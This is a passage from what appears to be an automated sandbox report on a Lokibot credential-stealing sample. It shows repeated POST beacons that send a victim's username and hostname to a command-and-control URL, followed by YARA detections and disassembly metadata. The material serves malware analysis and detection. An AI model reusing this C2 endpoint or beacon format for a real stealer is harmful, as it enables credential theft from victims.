Oct 1, 2024 10:56:50.310678005 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:50.315483093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:50.984432936 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49833	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:51.134881973 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:51.139744043 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:51.880937099 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49834	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:52.026005983 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:52.030834913 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:52.776621103 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49835	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:52.928201914 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:52.933069944 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:53.772931099 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49836	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:53.934497118 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:53.939405918 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:54.594682932 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49837	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:54.745157957 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:54.751235008 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:55.409951925 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49838	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:55.557056904 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:55.562072992 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:56.206754923 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49839	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:56.348913908 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:56.353976965 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:57.140919924 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49840	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:57.291670084 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:57.296632051 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:57.970891953 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49841	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:58.117475986 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:58.123183012 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:58.803797007 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49842	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:59.234206915 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:59.239027023 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:57:00.074596882 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49843	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:57:00.230870962 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:57:00.235929012 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:57:01.013664961 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49844	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:57:01.164479017 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:57:01.169312000 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:57:01.960577011 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	04:54:55
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Odeme_belgesi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Odeme_belgesi.exe"
Imagebase:	0x5d0000
File size:	554'496 bytes
MD5 hash:	FC9C0D308E1E66CAF355A329F171362A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:54:55
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Odeme_belgesi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Odeme_belgesi.exe
Imagebase:	0xd20000
File size:	554'496 bytes
MD5 hash:	FC9C0D308E1E66CAF355A329F171362A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	04:54:55
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Odeme_belgesi.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Odeme_belgesi.exe
Imagebase:	0x100000
File size:	554'496 bytes
MD5 hash:	FC9C0D308E1E66CAF355A329F171362A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 80
Imagebase:	0xec0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15.7%
Total number of Nodes:	172
Total number of Limit Nodes:	6

Executed Functions

Function 028ED310 Relevance: 6.4, Strings: 5, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/*2, xrefs: 028ED41C
VReJ, xrefs: 028ED465
'KEF, xrefs: 028ED49B
VReJ, xrefs: 028ED45E
.7>, xrefs: 028ED395

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: 'KEF$.7>$/*2$VReJ$VReJ
API String ID: 0-4064818871
Opcode ID: 8d7a5bb16c30c9a0b52122860138f7e80af2c9b5190b8a2be5a1f842c065dd2d
Instruction ID: a56d9724c02dc8c4ed643f00f1ec1109db9a771adf9351777ff7b00abf4620a8
Opcode Fuzzy Hash: 8d7a5bb16c30c9a0b52122860138f7e80af2c9b5190b8a2be5a1f842c065dd2d
Instruction Fuzzy Hash: 7671C374E01219CFCF08CFA9D9846EEBBB6FB89304F14942AD41AAB254E7345945CF54

Function 04FF67E0 Relevance: 2.7, Strings: 2, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tezq, xrefs: 04FF6A85
Tezq, xrefs: 04FF68F1

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: Tezq$Tezq
API String ID: 0-356135718
Opcode ID: ca6b645ef2c04fbc4af04a9f524985dfa46415e1ebadd1a58f6426d63e34b842
Instruction ID: 4487fa4e6c0758fa02a80b12c2e8115ceea10aadda9a82141f595b2dbde17967
Opcode Fuzzy Hash: ca6b645ef2c04fbc4af04a9f524985dfa46415e1ebadd1a58f6426d63e34b842
Instruction Fuzzy Hash: 53A15A71E00219CFDB04CFA9D9845EEFBB2FF89310F20956AD906AB265DB355816CF90

Function 028EB980 Relevance: 2.7, Strings: 2, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L"B$, xrefs: 028EBC32
L"B$, xrefs: 028EBC39

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: L"B$$L"B$
API String ID: 0-173250431
Opcode ID: 4eef956bb0f841521209f999767fa129355cb2c0377b37399dfb8d7c0ee03453
Instruction ID: bd5e9fbf3698dacac5f4c486839f41ef3121e4fc43d3a014eaef54739f8a83aa
Opcode Fuzzy Hash: 4eef956bb0f841521209f999767fa129355cb2c0377b37399dfb8d7c0ee03453
Instruction Fuzzy Hash: 81A108B8E04218DFDB08DFA9D58499EBBF2FF89305F148569E415AB364DB309942CF50

Function 028E24EB Relevance: 2.7, Strings: 2, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tezq, xrefs: 028E25B1
Tezq, xrefs: 028E2748

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: Tezq$Tezq
API String ID: 0-356135718
Opcode ID: e05110cb4459460b8b576ee77faea6786298a044c768ed63a17bb5b63bbf00e9
Instruction ID: 53e597af72c06cafdc289fe276ce19fb262a06bfc0e8007d742904e75db3c790
Opcode Fuzzy Hash: e05110cb4459460b8b576ee77faea6786298a044c768ed63a17bb5b63bbf00e9
Instruction Fuzzy Hash: 9E912478E042598FCB08CFA9C890ADEFBB2FF89300F14856AD856AB359D7319945CF50

Function 028EF590 Relevance: 2.7, Strings: 2, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*h"R, xrefs: 028EF9ED
y$rj, xrefs: 028EF8EF

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: *h"R$y$rj
API String ID: 0-1189100808
Opcode ID: ba6ffb45d4edb2461a48f896636201b99e046bc74caec4b177057457f124d4cf
Instruction ID: a8465c4d6615f79187d1c4a0ddb514c1d21fa2dd85436ffcabd935e2d771a445
Opcode Fuzzy Hash: ba6ffb45d4edb2461a48f896636201b99e046bc74caec4b177057457f124d4cf
Instruction Fuzzy Hash: C0811BB8D0420ADFCB14CF95C5814AEFBB2FF9A301B50D56AD516EB614D7349A42CF90

Function 028E2548 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tezq, xrefs: 028E25B1
Tezq, xrefs: 028E2748

Memory Dump Source

